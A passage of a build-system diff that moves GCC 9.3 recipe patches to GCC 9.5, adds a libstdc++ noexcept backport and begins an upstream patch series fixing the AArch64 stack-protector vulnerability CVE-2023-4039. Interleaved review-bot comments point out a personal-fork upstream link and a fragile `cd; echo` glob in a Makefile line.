+++ b/meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch b/meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch
index f427ee67c1..f427ee67c1 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch b/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch
new file mode 100644
index 0000000000..506064bfc2
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch
@@ -0,0 +1,44 @@
+From 60d966708d7cf105dccf128d2b7a38b0b2580a1a Mon Sep 17 00:00:00 2001
+From: Jonathan Wakely <jwakely@redhat.com>
+Date: Fri, 5 Nov 2021 21:42:20 +0000
+Subject: [PATCH] libstdc++: Fix inconsistent noexcept-specific for valarray
+ begin/end
+
+These declarations should be noexcept after I added it to the
+definitions in <valarray>.
+
+libstdc++-v3/ChangeLog:
+
+ * include/bits/range_access.h (begin(valarray), end(valarray)):
+ Add noexcept.
+
+(cherry picked from commit 2b2d97fc545635a0f6aa9c9ee3b017394bc494bf)
+
+Upstream-Status: Backport [https://github.com/hkaelber/gcc/commit/2b2d97fc545635a0f6aa9c9ee3b017394bc494bf]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+
+---
+ libstdc++-v3/include/bits/range_access.h | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/libstdc++-v3/include/bits/range_access.h b/libstdc++-v3/include/bits/range_access.h
+index 3d99ea92027..4736e75fda1 100644
+--- a/libstdc++-v3/include/bits/range_access.h
++++ b/libstdc++-v3/include/bits/range_access.h
+@@ -101,10 +101,10 @@ _GLIBCXX_BEGIN_NAMESPACE_VERSION
+
+ template<typename _Tp> class valarray;
+ // These overloads must be declared for cbegin and cend to use them.
+- template<typename _Tp> _Tp* begin(valarray<_Tp>&);
+- template<typename _Tp> const _Tp* begin(const valarray<_Tp>&);
+- template<typename _Tp> _Tp* end(valarray<_Tp>&);
+- template<typename _Tp> const _Tp* end(const valarray<_Tp>&);
++ template<typename _Tp> _Tp* begin(valarray<_Tp>&) noexcept;
++ template<typename _Tp> const _Tp* begin(const valarray<_Tp>&) noexcept;
++ template<typename _Tp> _Tp* end(valarray<_Tp>&) noexcept;
++ template<typename _Tp> const _Tp* end(const valarray<_Tp>&) noexcept;
+
+ /**
+ * @brief Return an iterator pointing to the first element of
+--
+2.25.1 \ No newline at end of file
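Review bot: The `Upstream-Status: Backport [...]` reference in this new patch header points at a personal GitHub fork (`github.com/hkaelber/gcc`) rather than the GCC project's own repository, so the header alone does not let a reader check the backport against the authoritative source. If 2b2d97fc545635a0f6aa9c9ee3b017394bc494bf is the upstream commit, as the `(cherry picked from commit ...)` line suggests, cite it there instead, e.g. `Upstream-Status: Backport [https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=2b2d97fc545635a0f6aa9c9ee3b017394bc494bf]`. The file also ends without a trailing newline (`\ No newline at end of file`), which is worth fixing in the same change.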
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch b/meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
index 23ec5bce03..23ec5bce03 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch b/meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch
index 17ec8986c1..17ec8986c1 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch b/meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch
index 3c28aeac63..3c28aeac63 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch b/meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch
index 906f3a7317..906f3a7317 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch b/meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
index 68a876cb95..68a876cb95 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch b/meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch
index 6acd2b0cf9..6acd2b0cf9 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch b/meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch
index 5a9e527606..5a9e527606 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch b/meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch
index a8103b951e..a8103b951e 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch b/meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
index d9d563d0f7..d9d563d0f7 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch b/meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch
index 9d98878096..f0b79ee145 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch
@@ -17,6 +17,10 @@ $(sort list) doesn't need this.
Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
Signed-off-by: Khem Raj <raj.khem@gmail.com>
+RP: gcc then added *.h and *.def additions to this list, breaking the original
+fix. Add the sort to the original gcc code, leaving the tr+sort to fix the original
+issue but include the new files too as reported by Zhuang <qiuguang.zqg@alibaba-inc.com>
+
Upstream-Status: Pending
---
gcc/Makefile.in | 2 +-
@@ -31,7 +35,7 @@ index fef6c4c61e3..57cf7804f0a 100644
# files. All other files are flattened to a single directory.
$(mkinstalldirs) $(DESTDIR)$(plugin_includedir)
- headers=`echo $(PLUGIN_HEADERS) $$(cd $(srcdir); echo *.h *.def) | tr ' ' '\012' | sort -u`; \
-+ headers="$(sort $(PLUGIN_HEADERS) $$(cd $(srcdir); echo *.h *.def))"; \
++ headers=`echo $(sort $(PLUGIN_HEADERS)) $$(cd $(srcdir); echo *.h *.def) | tr ' ' '\012' | sort -u`; \
srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*|]/\\\\&/g'`; \
for file in $$headers; do \
if [ -f $$file ] ; then \
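Review bot: On the rewritten `headers=` line, `$$(cd $(srcdir); echo *.h *.def)` still expands the glob when `cd` fails, so the `*.h`/`*.def` part of the list would then come from whatever directory the recipe happens to run in. The removed upstream line in this hunk has the same construct, so it is inherited rather than introduced, but since the line is being rewritten anyway it could read `$$(cd $(srcdir) && echo *.h *.def)`. The install loop that consumes `$$headers` continues past the end of the hunk, so how an unexpected entry is handled there is not visible from here.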
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch b/meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch
index 455858354f..455858354f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch b/meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch
index 2953859238..2953859238 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch b/meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
index d4445244e2..d4445244e2 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch b/meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
index 6f0833ccda..6f0833ccda 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch b/meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
index 96da013bf2..96da013bf2 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch b/meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch
index 2385099c25..2385099c25 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch b/meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch
index e0129d1f96..e0129d1f96 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch b/meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
index 1d2182140f..1d2182140f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch b/meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
index e363c7d445..e363c7d445 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch b/meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
index 846c0de5e8..846c0de5e8 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch b/meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch
index 102d6fc742..102d6fc742 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch b/meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
index 443e0a2ca6..443e0a2ca6 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch b/meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch
index 59ac97eaed..59ac97eaed 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch b/meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
index abfa7516da..abfa7516da 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch b/meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
index ae8acc7f13..ae8acc7f13 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch b/meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
index 52a5d97aef..52a5d97aef 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch b/meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
index bfa7e19dd0..bfa7e19dd0 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch b/meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch
index f8e8c07f62..f8e8c07f62 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch b/meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
index 60a29fc94d..60a29fc94d 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch b/meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
index 6f048dab82..6f048dab82 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch b/meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch
index f080b0596f..f080b0596f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch b/meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
index 3b7ccb3e3d..3b7ccb3e3d 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch b/meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch
index 5e199fbcfd..5e199fbcfd 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch b/meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch
index 825e070aa3..825e070aa3 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch b/meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
index f268a4eb58..f268a4eb58 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch b/meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
index a79fc03d15..a79fc03d15 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch b/meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
index b69114d1e5..b69114d1e5 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch b/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch
new file mode 100644
index 0000000000..56d229066f
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch
@@ -0,0 +1,1506 @@
+From: Richard Sandiford <richard.sandiford@arm.com>
+Subject: [PATCH 00/19] aarch64: Fix -fstack-protector issue
+Date: Tue, 12 Sep 2023 16:25:10 +0100
+
+This series of patches fixes deficiencies in GCC's -fstack-protector
+implementation for AArch64 when using dynamically allocated stack space.
+This is CVE-2023-4039. See:
+
+https://developer.arm.com/Arm%20Security%20Center/GCC%20Stack%20Protector%20Vulnerability%20AArch64
+https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x7ch-h5rf-w2mf
+
+for more details.
+
+The fix is to put the saved registers above the locals area when
+-fstack-protector is used.
+
+The series also fixes a stack-clash problem that I found while working
+on the CVE. In unpatched sources, the stack-clash problem would only
+trigger for unrealistic numbers of arguments (8K 64-bit arguments, or an
+equivalent). But it would be a more significant issue with the new
+-fstack-protector frame layout. It's therefore important that both
+problems are fixed together.
+
+Some reorganisation of the code seemed necessary to fix the problems in a
+cleanish way. The series is therefore quite long, but only a handful of
+patches should have any effect on code generation.
+
+See the individual patches for a detailed description.
+
+Tested on aarch64-linux-gnu. Pushed to trunk and to all active branches.
+I've also pushed backports to GCC 7+ to vendors/ARM/heads/CVE-2023-4039.
+
+CVE: CVE-2023-4039
+Upstream-Status: Submitted
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+
+From 78ebdb7b12d5e258b9811bab715734454268fd0c Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Fri, 16 Jun 2023 17:00:51 +0100
+Subject: [PATCH 01/10] aarch64: Explicitly handle frames with no saved
+ registers
+
+If a frame has no saved registers, it can be allocated in one go.
+There is no need to treat the areas below and above the saved
+registers as separate.
+
+And if we allocate the frame in one go, it should be allocated
+as the initial_adjust rather than the final_adjust. This allows the
+frame size to grow to guard_size - guard_used_by_caller before a stack
+probe is needed. (A frame with no register saves is necessarily a
+leaf frame.)
+
+This is a no-op as thing stand, since a leaf function will have
+no outgoing arguments, and so all the frame will be above where
+the saved registers normally go.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_layout_frame): Explicitly
+ allocate the frame in one go if there are no saved registers.
+---
+ gcc/config/aarch64/aarch64.c | 8 +++++---
+ 1 file changed, 5 insertions(+), 3 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index a35dceab9fc..e9dad682738 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4771,9 +4771,11 @@ aarch64_layout_frame (void)
+ max_push_offset = 256;
+
+ HOST_WIDE_INT const_size, const_fp_offset;
+- if (cfun->machine->frame.frame_size.is_constant (&const_size)
+- && const_size < max_push_offset
+- && known_eq (crtl->outgoing_args_size, 0))
++ if (cfun->machine->frame.saved_regs_size == 0)
++ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
++ else if (cfun->machine->frame.frame_size.is_constant (&const_size)
++ && const_size < max_push_offset
++ && known_eq (crtl->outgoing_args_size, 0))
+ {
+ /* Simple, small frame with no outgoing arguments:
+ stp reg1, reg2, [sp, -frame_size]!
+--
+2.34.1
+
+
+From 347487fffa0266d43bf18f1f91878410881f596e Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Fri, 16 Jun 2023 16:55:12 +0100
+Subject: [PATCH 02/10] aarch64: Add bytes_below_hard_fp to frame info
+
+The frame layout code currently hard-codes the assumption that
+the number of bytes below the saved registers is equal to the
+size of the outgoing arguments. This patch abstracts that
+value into a new field of aarch64_frame.
+
+gcc/
+ * config/aarch64/aarch64.h (aarch64_frame::bytes_below_hard_fp): New
+ field.
+ * config/aarch64/aarch64.c (aarch64_layout_frame): Initialize it,
+ and use it instead of crtl->outgoing_args_size.
+ (aarch64_get_separate_components): Use bytes_below_hard_fp instead
+ of outgoing_args_size.
+ (aarch64_process_components): Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 50 +++++++++++++++++++-----------------
+ gcc/config/aarch64/aarch64.h | 6 ++++-
+ 2 files changed, 32 insertions(+), 24 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index e9dad682738..25cf10cc4b9 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4684,6 +4684,8 @@ aarch64_layout_frame (void)
+ last_fp_reg = regno;
+ }
+
++ cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
++
+ if (cfun->machine->frame.emit_frame_chain)
+ {
+ /* FP and LR are placed in the linkage record. */
+@@ -4751,11 +4753,11 @@ aarch64_layout_frame (void)
+ STACK_BOUNDARY / BITS_PER_UNIT);
+
+ /* Both these values are already aligned. */
+- gcc_assert (multiple_p (crtl->outgoing_args_size,
++ gcc_assert (multiple_p (cfun->machine->frame.bytes_below_hard_fp,
+ STACK_BOUNDARY / BITS_PER_UNIT));
+ cfun->machine->frame.frame_size
+ = (cfun->machine->frame.hard_fp_offset
+- + crtl->outgoing_args_size);
++ + cfun->machine->frame.bytes_below_hard_fp);
+
+ cfun->machine->frame.locals_offset = cfun->machine->frame.saved_varargs_size;
+
+@@ -4775,23 +4777,23 @@ aarch64_layout_frame (void)
+ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
+ else if (cfun->machine->frame.frame_size.is_constant (&const_size)
+ && const_size < max_push_offset
+- && known_eq (crtl->outgoing_args_size, 0))
++ && known_eq (cfun->machine->frame.bytes_below_hard_fp, 0))
+ {
+- /* Simple, small frame with no outgoing arguments:
++ /* Simple, small frame with no data below the saved registers.
+ stp reg1, reg2, [sp, -frame_size]!
+ stp reg3, reg4, [sp, 16] */
+ cfun->machine->frame.callee_adjust = const_size;
+ }
+- else if (known_lt (crtl->outgoing_args_size
++ else if (known_lt (cfun->machine->frame.bytes_below_hard_fp
+ + cfun->machine->frame.saved_regs_size, 512)
+ && !(cfun->calls_alloca
+ && known_lt (cfun->machine->frame.hard_fp_offset,
+ max_push_offset)))
+ {
+- /* Frame with small outgoing arguments:
++ /* Frame with small area below the saved registers:
+ sub sp, sp, frame_size
+- stp reg1, reg2, [sp, outgoing_args_size]
+- stp reg3, reg4, [sp, outgoing_args_size + 16] */
++ stp reg1, reg2, [sp, bytes_below_hard_fp]
++ stp reg3, reg4, [sp, bytes_below_hard_fp + 16] */
+ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
+ cfun->machine->frame.callee_offset
+ = cfun->machine->frame.frame_size - cfun->machine->frame.hard_fp_offset;
+@@ -4799,22 +4801,23 @@ aarch64_layout_frame (void)
+ else if (cfun->machine->frame.hard_fp_offset.is_constant (&const_fp_offset)
+ && const_fp_offset < max_push_offset)
+ {
+- /* Frame with large outgoing arguments but a small local area:
++ /* Frame with large area below the saved registers, but with a
++ small area above:
